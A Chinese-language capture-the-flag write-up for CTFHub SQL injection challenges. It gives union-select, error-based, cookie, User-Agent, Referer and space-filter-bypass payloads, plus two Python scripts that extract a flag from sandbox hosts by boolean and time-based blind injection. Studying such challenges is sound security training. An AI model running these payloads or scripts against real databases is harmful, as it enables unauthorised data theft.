整数型注入
不需考虑任何过滤,由于始终只返回第一行的信息,所以使用LIMIT来查看其他行的返回。
常规注入流程:爆数据库名->爆表名->爆字段名->使用union select获得想要知道的对应字段的内容。
爆数据库名
1 union select database(),1 limit 1,2
数据库为sqli
爆表名
通过更改
limit的值得到sqli数据库中可能藏有flag的表名
1 union select table_name,1 from information_schema.tables where table_schema='sqli' limit 2,3
爆字段名
通过更改
limit的值得到flag表可能藏有flag的字段名
1 union select column_name,1 from information_schema.columns where table_schema='sqli' and table_name='flag' limit 1,2
对应字段的内容
得到flag,
payload:
1 union select flag,1 from flag limit 1,2
字符型注入
同上题目,但是为字符型,需考虑单引号,在1后加单引号’将字符型的引号闭合后进行注入语句构造
payload:
1' union select flag,1 from flag limit 1,2;#
报错注入
1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
参考:https://www.cnblogs.com/anweilx/p/12464859.html
布尔盲注
首先要知道mysql中if的用法
?id=if(爆破库名表名字段名,1,(select table_name from information_schema.tables))
当expr1正确时,返回expr2(也就是1),回显query_success,当expr1错误时,返回expr3(也就是select table_name from information_schema.tables的结果,由于该查询结果返回不止一行,所以回显query_error),通过这里可以爆出所有需要信息
大佬py脚本:
import requests
import time
urlOPEN = 'http://challenge-你自己环境的连接.sandbox.ctfhub.com:10080/?id='
starOperatorTime = []
mark = 'query_success'
def database_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
# print(url+'%23')
r = requests.get(url)
if mark in r.text:
name = name+i
print(name)
break
print('database_name:',name)
def table_name():
list = []
for k in range(0,4):
name=''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
# print(url+'%23')
r = requests.get(url)
if mark in r.text:
name = name+i
break
list.append(name)
print('table_name:',list)
#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间: " + str(sum(starOperatorTime)/100))
def column_name():
list = []
for k in range(0,3): #判断表里最多有4个字段
name=''
for j in range(1,9): #判断一个 字段名最多有9个字符组成
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
r=requests.get(url)
if mark in r.text:
name=name+i
break
list.append(name)
print ('column_name:',list)
def get_data():
name=''
for j in range(1,50): #判断一个值最多有51个字符组成
for i in range(48,126):
url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
r=requests.get(url)
if mark in r.text:
name=name+chr(i)
print(name)
break
print ('value:',name)
if __name__ == '__main__':
database_name()
column_name()
get_data()
时间盲注
尝试
if((substr(database(),1,1)='s'),sleep(1),1)
返回时长明显边长,注入成功,接下来就可以写脚本一步一步爆出所有所需信息。
脚本来源:https://blog.csdn.net/weixin_45254208/article/details/107578439
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
import sys
import time
session=requests.session()
url = "http://challenge-e53e5a329b0199fa.sandbox.ctfhub.com:10080/?id="
name = ""
for k in range(1,10):
for i in range(1,10):
#print(i)
for j in range(31,128):
j = (128+31) -j
str_ascii=chr(j)
#数据库名
payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii))
#表名
#payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii))
#字段名
#payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
start_time=time.time()
str_get = session.get(url=url + payolad)
end_time = time.time()
t = end_time - start_time
if t > 1:
if str_ascii == "+":
sys.exit()
else:
name+=str_ascii
break
print(name)
#查询字段内容
for i in range(1,50):
#print(i)
for j in range(31,128):
j = (128+31) -j
str_ascii=chr(j)
payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" %(i,str_ascii)
start_time = time.time()
str_get = session.get(url=url + payolad)
end_time = time.time()
t = end_time - start_time
if t > 1:
if str_ascii == "+":
sys.exit()
else:
name += str_ascii
break
print(name)
MySQL结构
没搞懂这题考啥。。爆出表名和字段名后直接用union select没有回显,所以直接sqlmap
Cookie注入
和第一个整数型注入一摸一样,只是注入地方变成了cookie的位置
UA注入
也就是User-Agent注入
同上题,只是注入位置变为了User-Agent
image.png
Refer注入
regerer头含义:
在包中加入referer头即可完成注入
过滤空格
可以使用最简单的/**/代替空格,题目只是给了方向,有更多空格绕过的方式有待学习
